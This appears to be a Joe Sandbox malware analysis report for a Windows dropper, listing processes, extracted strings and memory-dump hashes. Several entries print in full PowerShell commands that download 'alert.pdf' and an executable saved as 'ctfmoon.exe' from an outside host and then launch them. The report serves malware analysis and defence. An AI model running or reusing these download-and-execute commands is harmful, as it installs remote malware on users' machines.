                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:1
                                                              Start time:09:46:28
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:09:46:28
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:09:46:35
                                                              Start date:06/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
                                                              Imagebase:0x7ff6153b0000
                                                              File size:5'641'176 bytes
                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:5
                                                              Start time:09:46:35
                                                              Start date:06/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                              Imagebase:0x7ff61f300000
                                                              File size:3'581'912 bytes
                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:6
                                                              Start time:09:46:36
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                              Imagebase:0x7ff77afe0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:7
                                                              Start time:09:46:36
                                                              Start date:06/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1596,i,12408767835003218627,8861379469550011944,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                              Imagebase:0x7ff61f300000
                                                              File size:3'581'912 bytes
                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:13
                                                              Start time:09:46:44
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:09:46:44
                                                              Start date:06/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Reset < >
                                                                Strings
                                                                • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), xrefs: 0040100B
                                                                • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"), xrefs: 00401016
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1643276097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1643221914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1643312044.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1643342903.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_lg1wwLsmCX.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")$powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                                • API String ID: 0-3628893888
                                                                • Opcode ID: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                                • Instruction ID: 1508df73bb81b20edbd2416e362e01711401bb553aa95eecbcdc2692af4642b4
                                                                • Opcode Fuzzy Hash: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                                • Instruction Fuzzy Hash: 6C312D31715B408EF7509B66E89038E36B4E788788F50427AEF5DE7BA9EF39C5408744
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1643276097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1643221914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1643312044.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1643342903.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_lg1wwLsmCX.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                                • Instruction ID: 37283cf5fd5ade48ec6d96cf6941fcaa95a322ea8f96897c16376f9f7fb2df5f
                                                                • Opcode Fuzzy Hash: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                                • Instruction Fuzzy Hash: 89F0FF61B006009EE700DBB5C4513DE3371A74478CF00057AEE0CB7B99DA38CA018794
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1510033384.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction ID: c9e914f1ce835b35214027747c8b5bae58525f0394af00b361ad7d0fed646684
                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction Fuzzy Hash: 2401677115CB0D4FD744EF0CE451AAAB7E0FB95364F10056EE58AC3651D736E882CB46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: tM_L
                                                                • API String ID: 0-4279417444
                                                                • Opcode ID: 342137b1ff50ac7d79a72ff833c7b5d78c86b1ebcd259c448ddbd435840f8505
                                                                • Instruction ID: d8224217d2b9b5b49d87f80432f84080c1db17bbae58d234c614b1d56528d27e
                                                                • Opcode Fuzzy Hash: 342137b1ff50ac7d79a72ff833c7b5d78c86b1ebcd259c448ddbd435840f8505
                                                                • Instruction Fuzzy Hash: A541263160CA894FE749AB2CD8559B53BF1EF56364B0401FED489CB193DE1AA883C792
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 615d71ec4f6958bb078e6e72dafeb5bdf5251f093709daee85d787eb146120b5
                                                                • Instruction ID: 551f265747145a187d73540497e8ce9fbccbda13eb77124881a3766eb6c9d32f
                                                                • Opcode Fuzzy Hash: 615d71ec4f6958bb078e6e72dafeb5bdf5251f093709daee85d787eb146120b5
                                                                • Instruction Fuzzy Hash: CB421812D4DAC68FE7A58A78981917CBFF2FF62650B5801FFC088CB1DBE8189905D752
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637840905.00007FF887DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887dc0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37effa1fadea78092fc915f56180ab4fc9f3128f5d035797821c277ecd4a9872
                                                                • Instruction ID: 5fc31a9271ba658ba4659d98c7bffe9ae1fea64c9ffb701a7854be1db3c0a819
                                                                • Opcode Fuzzy Hash: 37effa1fadea78092fc915f56180ab4fc9f3128f5d035797821c277ecd4a9872
                                                                • Instruction Fuzzy Hash: 55D16732D4DA8A4FEB55AB6848546BDBBF0FF453D4B0802FED00EC7293DA18A805D352
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20b9bf4bad2e871f65b95faca06597de1dc1f11236ce26bb528e4d6c5f2447a9
                                                                • Instruction ID: 4d14daa2304dacf1f24266d651333391a3bc60c8234e8cb50bb98c7c01079ff5
                                                                • Opcode Fuzzy Hash: 20b9bf4bad2e871f65b95faca06597de1dc1f11236ce26bb528e4d6c5f2447a9
                                                                • Instruction Fuzzy Hash: 02A1BD31A0CA8C4FEB95DB68D8657ECBBB1FF22350F1441BBC08DD7192DA685985CB42
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ad38df2a177dded6871bae6517247034a3f8e1d3c3118bbf641c9304168a4df
                                                                • Instruction ID: 83cf42b9d3bd936f9439f4d0a9c4683c07601758d236c4b3ea5978680d0609d6
                                                                • Opcode Fuzzy Hash: 2ad38df2a177dded6871bae6517247034a3f8e1d3c3118bbf641c9304168a4df
                                                                • Instruction Fuzzy Hash: 0991BC31A0CA8C8FEB95DB6898597ECBBB1FF66310F0441BBC08DD7193DA645986CB41
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction ID: c9e914f1ce835b35214027747c8b5bae58525f0394af00b361ad7d0fed646684
                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction Fuzzy Hash: 2401677115CB0D4FD744EF0CE451AAAB7E0FB95364F10056EE58AC3651D736E882CB46
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5310e2622dfc37f4d47f96d2b38e307ab091e721b319df31d42f3422c2627b63
                                                                • Instruction ID: 84aca2be7ab2414437bd8e81e58abf24fb590a2e37720b974d1e6714722251a6
                                                                • Opcode Fuzzy Hash: 5310e2622dfc37f4d47f96d2b38e307ab091e721b319df31d42f3422c2627b63
                                                                • Instruction Fuzzy Hash: 6CC1A146D4E6C18FD34687789D5D278AFE2BF26290B1801FFC0948B1DBE98D8909D357
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (0_$8,_$H1_$P/_$]$p0_$-_$/_
                                                                • API String ID: 0-2624468954
                                                                • Opcode ID: 76d2f66015403b207efef863c4381402a4ce65b96ec8db9164dfe55f4664e6a1
                                                                • Instruction ID: d061bd472ecc94e5583278caf602abda3eaeac7decadbb3cc199d7b815c44804
                                                                • Opcode Fuzzy Hash: 76d2f66015403b207efef863c4381402a4ce65b96ec8db9164dfe55f4664e6a1
                                                                • Instruction Fuzzy Hash: 4F31F162E8EAC54FE31642786C18138AFF3BF46A9071840FFC05C474DBDA859895C356
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (0_$8,_$P/_$]$p0_$-_$/_
                                                                • API String ID: 0-1902751526
                                                                • Opcode ID: d7fcef81f6fc33dca70357fe80db6bd05b0415e5b32981bf5f6ce9854a92bccb
                                                                • Instruction ID: 4cec14e6766d33db277da9554f45bc6a4f46e93ac7837cb58e89d78975d975b7
                                                                • Opcode Fuzzy Hash: d7fcef81f6fc33dca70357fe80db6bd05b0415e5b32981bf5f6ce9854a92bccb
                                                                • Instruction Fuzzy Hash: 1F51C552D8E6C24FF3564278AC2513C6FB2BF13AA071C00FFC4A88B0D7DA895899C356
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @J_$I$]$p@s$x._
                                                                • API String ID: 0-17577835
                                                                • Opcode ID: 9477dd9b0996bfc42cc3c66f63a10504d3b6334e03709286e3779605d6d9cdcc
                                                                • Instruction ID: 2ecc6a273ec59c87a00e87925862e052de203856fbd21f6d54f1e31e1d7fb844
                                                                • Opcode Fuzzy Hash: 9477dd9b0996bfc42cc3c66f63a10504d3b6334e03709286e3779605d6d9cdcc
                                                                • Instruction Fuzzy Hash: 2F61C152D8EAC14FF31646A9781427D6FB2FF42E9079840FBC09C8B0DBE8859D99D316